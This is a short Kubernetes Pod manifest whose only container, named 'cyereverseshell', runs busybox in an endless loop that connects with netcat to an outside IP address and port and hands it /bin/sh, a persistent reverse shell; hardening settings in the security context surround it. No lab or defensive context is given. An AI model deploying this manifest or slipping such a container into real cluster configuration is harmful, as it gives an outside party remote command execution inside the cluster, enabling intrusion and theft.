apiVersion: v1
kind: Pod
metadata:
  name: cyerspod
  namespace: nati
  labels:
    app: nc
spec:
  serviceAccountName: cyerspod-sa
  containers:
  - name: cyereverseshell
    image: busybox
    args: ["sh", "-c", "while true; do nc -vvv 68.183.22.232 4641 -e /bin/sh; sleep 10; done"]
    securityContext:
      runAsNonRoot: true  # Ensure the container does not run as root
      runAsUser: 1000  # Set non-root UID
      allowPrivilegeEscalation: false  # Prevent privilege escalation
      capabilities:
        drop: ["ALL"]  # Drop unnecessary capabilities for security
      seccompProfile:
        type: RuntimeDefault
